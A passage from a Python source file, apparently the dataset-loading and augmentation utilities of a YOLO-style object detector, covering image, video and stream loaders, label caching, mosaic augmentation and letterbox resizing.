elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix('.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path, prefix) # re-cache
else:
cache = self.cache_labels(cache_path, prefix) # cache
# Display cache
[nf, nm, ne, nc, n] = cache.pop('results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + desc, total=n, initial=n)
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9 = []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
labels9.append(labels)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
if len(labels9):
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:]) # use with random_perspective
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
